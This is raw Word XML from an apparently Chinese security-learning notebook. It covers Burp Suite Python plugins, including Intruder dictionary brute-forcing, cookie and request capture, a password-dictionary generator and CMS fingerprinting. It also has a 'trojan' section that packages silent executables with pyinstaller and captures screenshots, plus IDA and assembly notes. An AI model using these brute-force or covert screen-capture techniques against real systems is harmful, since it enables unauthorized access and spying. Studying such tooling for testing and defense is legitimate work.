            <wp:docPr id="109" name="图片 109" descr="屏幕截图 2023-07-02 22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07-02 2235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之后启动主机win10下的服务端的python代码，可以在kali的运行python中发现请求的IP地址信息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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:90.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId184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183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337050"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="110" name="图片 110" descr="屏幕截图 2023-07-02 22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07-02 2241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之后客户端发送请求就能够得到响应了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016125"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10795"/>
            <wp:docPr id="111" name="图片 111" descr="屏幕截图 2023-07-02 22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07-02 22442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46" w:name="_Toc24550"/>
      <w:bookmarkStart w:id="47" w:name="_Toc20211"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite基于python插件开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc7151"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）环境配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/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在Burp Suite中选择Extender-Options-Python Environment配置jython的文件位置（jython是用来将python转换为java的文件）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764155"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="112" name="图片 112" descr="屏幕截图 2023-07-03 23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07-03 23274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官方文档已经导出到本地文件夹中：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813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49" w:name="_Toc28628"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Burp Suite使用Python脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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编写python脚本如下，之后在Extensions中点击Add，选择文件类型为Python，点击Select file...导入python脚本，点击打开：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33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0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189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#导入接口类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print("Hello Burp!")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947920"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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之后程序自动运行并在Output中输出结果，如果有错误会在Errors中输出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958080"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1016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0" w:name="_Toc29193"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）自定义Burp Suite插件名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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自定义插件名称，编写脚本如下，可以看到导入后名称编程了代码里指定的名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1034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4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193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32585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1333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1" w:name="_Toc9834"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）自定义Burp Suite插件并引入到菜单项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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自定义插件引入到邮件菜单项中，含有二级菜单，并且通过二级菜单出发函数执行操作，点击调用函数的二级菜单，在output中可以看到函数执行的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1035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7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196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IBurpExtender,IContextMenuFactory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JMenuItem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IContextMenuFactory):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callbacks.registerContextMenuFactory(self)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createMenuItems(self, invocation):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 = []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 = JMenu("Hello I an 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subMenu_1 = JMenuItem("I am subMenu")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main_menu.add(subMenu_1)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subMenu_2 = JMenuItem('Send to other Method',actionPerformed=self.run)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menu_list.append(main_menu)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menu_list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run(self, event):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print(event)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print('Menu run.')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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440305"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1333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2" w:name="_Toc31288"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（五）自定义Burp Suite插件获取cookies信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本获取cookies信息，通过监听浏览器的网页操作得到cookies信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1036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0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19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IBurpExtender,ICookie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ICookie):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self._callbacks = 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cookies = self._callbacks.getCookieJarContents()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self.cookiesInformations(cookies)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cookiesInformations(self, cookies):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i in cookies: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 i.getDomain()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print(i.getName() + ':' + i.getValue())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477645"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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3" w:name="_Toc1581"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Burp Suite官方文档提供了很多工具方法，例如Base64编码等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1037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20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self._helps = callbacks.getHelpers()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print(self._helps.base64Encode("MyExten"))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5680" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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4" w:name="_Toc32166"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（七）自定义Burp Suite插件完全删除所有相关项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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在删除或者取消插件时，如果需要将插件生成的相关文件信息全部删除，那么使用如下脚本即可实现全面清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1038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6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20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IExtensionStateListener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IExtensionStateListener):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callbacks.registerExtensionStateListener(self)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extensinUnloaded(self):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print("MyExten Unloaded!")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55" w:name="_Toc28901"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本监听获取HTTP请求信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1039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8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20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reqMsg = self._helpers.bytesToString(messageInfo.getRequest())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print("Http Requests:" + reqMsg)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00805"/>
            <wp:effectExtent l="0" t="0" r="5715" b="63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6" w:name="_Toc18200"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/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脚本监听Http或者Https的Host、port以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1040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1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210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#coding=utf-8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#导入接口类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IHttpService = messageInfo.getHttpService()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print("Host:\t", IHttpService.getHost())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print("Port:\t", IHttpService.getPort())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print("Protocol:\t", IHttpService.getProtocol())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576320"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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15838"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十）自定义Burp Suite插件使用本地字典爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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编写脚本实现自己的Intruder，并在本地创建字典.txt。将Burp Suite拦截的请求发送到Intruder，在Positions中设置好变量，之后在Payloads中将Payload Sets中的Payload type设置为Extension-generated，再点击Payload Options-Select generated，就能发现脚本中编写的My Intruder，选择后点击OK，点击Start Attack进行字典内容的遍历爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1041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4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213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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:57.8pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId216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21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IIntruderPayloadGeneratorFactory, IIntruderPayloadGenerator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IIntruderPayloadGeneratorFactory):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callbacks.registerIntruderPayloadGeneratorFactory(self)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createNewInstance(self, attack):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mtattack = attack.getHttpService()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template = attack.getRequestTemplate()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IntruderPayloadGenerator()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getGeneratorName(self):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Intruder'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IntruderPayloadGenerator(IIntruderPayloadGenerator):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 = open('pwd_192.txt', 'r')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self.payload = [i.strip() for i in f]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f.close()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self.count = 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self.flag =True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hasMorePayloads(self):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self.flag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#baseValue为Position中标记的基准值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getNextPayload(self,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len(self.payload) &gt; self.count + 1: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self.count +=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print(self.payload[self.count])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self.payload[self.count]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self.flag = false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rest(self):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字典文件我就只写了1、2、3，根据需求使用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33040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1016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929255"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065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20595"/>
            <wp:effectExtent l="0" t="0" r="5715" b="444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8" w:name="_Toc4576"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本编写自己的Intruder并批量处理字典内容后爆破，还是先在Intruder-Payloads-Payload type设置为Simple list，之后在Payload Options中选择Load...上传字典，再点击Payload Processing中的Add按钮，选择Invoke Burp extension后可以看到脚本中的My Processor，选择后点击OK，这里爆破可以看到脚本中base64编码处理过的内容进行了爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1043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1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220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base64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IIntruderPayloadProcessor):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callbacks.registerIntruderPayloadProcessor(self)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getProcessorName(self):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Processor'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processPayload(self, currentPayload, originalPayload,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currentPayload = self._helpers.bytesToString(currentPayload)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newPayload = base64.b16encode(currentPayload)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newPayload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24935"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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061335"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="1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bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc16267"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自定义Web服务&amp;快速找出IP地址泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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本地起一个ip端口网址，效果见八-1-(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1044" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId225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224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flask import Flask, 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 = Flask(__name__)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index():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@app.route('/ip/&lt;random&gt;')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ip(random):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@app.route('/key/&lt;random&gt;')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key(random):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'access_token: random-' + str(time.time())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app.run(debug = True, port = 9999)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在检测IP地址端口访问的时候，可以在Dashboard中的Issue activity看到各个IP端口访问情况，可以选择全部右键选择Report issue导出文件，一直点next知道出现选择保存文件位置的时候，自己设置保存的HTML格式文件名及位置，点击保存后一直点next到结束，就可以看到保存的HTML文件了，便于查看整理信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1045" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId227" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1045" DrawAspect="Content" ObjectID="_1468075745" r:id="rId226">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3840480" cy="3459480"/>
            <wp:effectExtent l="0" t="0" r="0" b="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91180"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc357"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows基于python木马脚本开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60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1" w:name="_Toc17267"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）简单输出程序及静默化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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首先打开包安装文件夹，我这里是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C:\Users\Lenovo\AppData\Roaming\Python\Python39\Scrip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ts，在这个文件夹打开cmd，输入pyinstaller.exe -F 文件名即可打包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61310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="1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之后会生成dist文件夹，里面存放着生成的exe文件，cmd输入exe文件名，运行得到结果就是python脚本运行结果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792730"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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输入&gt;pyinstaller.exe -F 文件名 -i 图表名即可打包并将图标设置为指定图标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30350"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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输入&gt;pyinstaller.exe -F -w文件名即可打包并静默化exe，也就是双击exe会执行，但是不弹出窗口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2" w:name="_Toc28135"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）截图程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62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进行屏幕截图并在指定位置生成bmp图片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1046" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId234" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1046" DrawAspect="Content" ObjectID="_1468075746" r:id="rId23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运行后生成截图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30" name="图片 1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screenshot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win32gui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win32con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win32api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获取桌面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hdesktop = win32gui.GetDesktopWindow()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分辨率适应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 = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)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height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)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left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)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= win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)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desktop_dc = win32gui.GetWindowDC(hdesktop)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img_dc = win32ui.CreateDCFromHandle(desktop_dc)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创建一个内存设备描述表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 = img_dc.CreateCompatibleDC()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创建位图对象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 = win32ui.CreateBitmap()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screenshot.CreateCompatibleBitmap(img_dc, width, height)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mem_dc.SelectObject(screenshot)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截图至内存设备描述表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mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)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将截图保存到文件中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screenshot.SaveBitmapFile(mem_dc, u'C:\\Users\\Lenovo\\Desktop\\screenshot.bmp')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内存释放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mem_dc.DeleteDC()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win32gui.DeleteObject(screenshot.GetHandle())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc18016"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python信息搜集工具开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63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4" w:name="_Toc30824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）高精度字典生成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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高精度字典生成，读取ini配置文件中带参数的正则表达式以及txt中参数值范围，之后运行得到指定条件下的高精度字典并输出的txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1047" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId237" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1047" DrawAspect="Content" ObjectID="_1468075747" r:id="rId236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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId239" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1048" DrawAspect="Content" ObjectID="_1468075748" r:id="rId238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41" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1049" DrawAspect="Content" ObjectID="_1468075749" r:id="rId240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50" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId243" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1050" DrawAspect="Content" ObjectID="_1468075750" r:id="rId242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exrex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#传入余个host, demo.webdic.com. 那么，demo, webdic都可能作为字典的一部分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web_white = ['com', 'cn', 'gov', 'edu', 'org', 'www']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host_para(host):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#对host进行分析，处理成想要的格式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'://'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host.split('://')[1].replace('/',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host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dic_creat(hosts):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web_dics = hosts.split('.')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#取出有用的东西，如demo, webdic, 放入字典生成的地方，生成字典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#将核心的生成规则，写入配置文件，方便后期使用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f_rule = open('rule.ini', 'r', encoding='utf-8')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f_rule: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'#' != i[0]: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rule = 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 = open('pass_1.txt', 'w')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web_dic in web_dics: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web_dic not in web_white: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f_pass = open('pass_0.txt', 'r')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dic_pass in f_pass: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dics = list(exrex.generate(rule.format(web_dic = web_dic, dic_pass = dic_pass.strip('\n'))))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for dic in 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len(dic) &gt; 4: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 = open('pass_1.txt', 'a+')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f_pass_out.write(dic + '\n')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print(dic)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dic_creat(host_para(sys.argv[0]))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sys.exit(0)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#dic_create(host_para('demo.webdic.com'))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5" w:name="_Toc10020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）指纹识别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:50.2pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId245" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1051" DrawAspect="Content" ObjectID="_1468075751" r:id="rId244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builtwith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urllib.parse import urlparse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requests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hashlib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argparse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BuiltCms(object):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__init__(self, url):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super(BuiltCms, self).__init__()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self.url = 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#调用builtwith，识别web开发信息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self.built()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#调用识别方法，识别web的cms信息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self.cms()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result['cms'] = cms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#打印结果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 (result)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built(self):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builtwith.parse(self.url)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result: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result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{}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cms(self):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#这里要遍历指纹数据库作比较，进行页面MD5比较以及运行页面内容匹配识别，就不举例了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'cms_name_phpcms'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md5(self,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hashlib.md5(content).getdigest()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cont(self, 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re.search(regex,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False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 = BuiltCms('http://www.phpcms.com')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 = argparse.ArgumentParser(description = "CMS NuiltScan Ver:1.0")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paraser.add_argument("-u", "--url", metavar = "", help = "weburl address")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args = paraser.parse_args()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try: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url = args.url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not url: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print('Usage : cms.py -u http://tests.com/')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sys.exit(1)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BuiltCms(url)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print('[*]Fecting CMS ...')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print('\n\t{}\n'.format(result))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print('[-]Complete')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except KeyboardInterrupt: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sys.exit(1)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6" w:name="_Toc9957"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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7" w:name="_Toc13428"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）基本操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67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查看窗口几种方式:F5、Tap、双击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弹出窗口恢复:Windows-Reset Desktop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各种窗口打开:Windows下选择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 View页面格式转换:右键Graph view和右键Text view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修改汇编指令:Edit-Patch program-Assmble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修改地址大小值:Edit-Patch program-Change byte...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函数改名:右键-N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导出文件:Edit-Patch-program，之后选上Create backup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显示不同格式数字:点击数字右键选择不同格式显示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查看010Editor窗口F6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8" w:name="_Toc4927"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）汇编指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68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通用数据传送指令.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 传送字或字节.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MOVSX 先符号扩展,再传送.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MOVZX 先零扩展,再传送.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 把字压入堆栈.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 把字弹出堆栈.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 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.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 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.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PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.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POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.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BSWAP 交换32位寄存器里字节的顺序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XCHG 交换字或字节.( 至少有一个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作数为寄存器,段寄存器不可作为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CMPXCHG 比较并交换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作数.( 第二个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作数必须为累加器AL/AX/EAX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XADD 先交换再累加.( 结果在第一个**作数里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XLAT 字节查表转换.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── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即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0-FFH); 返回 AL 为查表结果. ( [BX+AL]-&gt;AL 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IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX}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OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器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输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,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其范围是 0-65535.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目的地址传送指令.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LEA 装入有效地址.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LEA DX,string ;把偏移地址存到DX.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LDS 传送目标指针,把指针内容装入DS.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LDS SI,string ;把段地址:偏移地址存到DS:SI.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LES 传送目标指针,把指针内容装入ES.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LES DI,string ;把段地址:偏移地址存到ES:DI.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LFS 传送目标指针,把指针内容装入FS.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LFS DI,string ;把段地址:偏移地址存到FS:DI.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LGS 传送目标指针,把指针内容装入GS.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LGS DI,string ;把段地址:偏移地址存到GS:DI.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LSS 传送目标指针,把指针内容装入SS.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LSS DI,string ;把段地址:偏移地址存到SS:DI.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标志传送指令.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LAHF 标志寄存器传送,把标志装入AH.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SAHF 标志寄存器传送,把AH内容装入标志寄存器.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PUSHF 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POPF 标志出栈.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PUSHD 32位标志入栈.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POPD 32位标志出栈.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69" w:name="t1"/>
      <w:bookmarkEnd w:id="69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ADD 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"https://so.csdn.net/so/search?q=ADC&amp;spm=1001.2101.3001.7020"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ADC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 带进位加法.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INC 加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AAA 加法的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"https://so.csdn.net/so/search?q=ASCII%E7%A0%81&amp;spm=1001.2101.3001.7020"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ASCII码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DAA 加法的十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"https://so.csdn.net/so/search?q=%E8%BF%9B%E5%88%B6&amp;spm=1001.2101.3001.7020"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进制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SUB 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SBB 带借位减法.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DEC 减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NEC 求反(以 0 减之).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 比较.(两**作数作减法,仅修改标志位,不回送结果).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AAS 减法的ASCII码调整.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DAS 减法的十进制调整.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MUL 无符号乘法.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IMUL 整数乘法.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以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),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AAM 乘法的ASCII码调整.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DIV 无符号除法.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IDIV 整数除法.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以上两条,结果回送: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商回送AL,余数回送AH, (字节运算);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或 商回送AX,余数回送DX, (字运算).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AAD 除法的ASCII码调整.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CBW 字节转换为字. 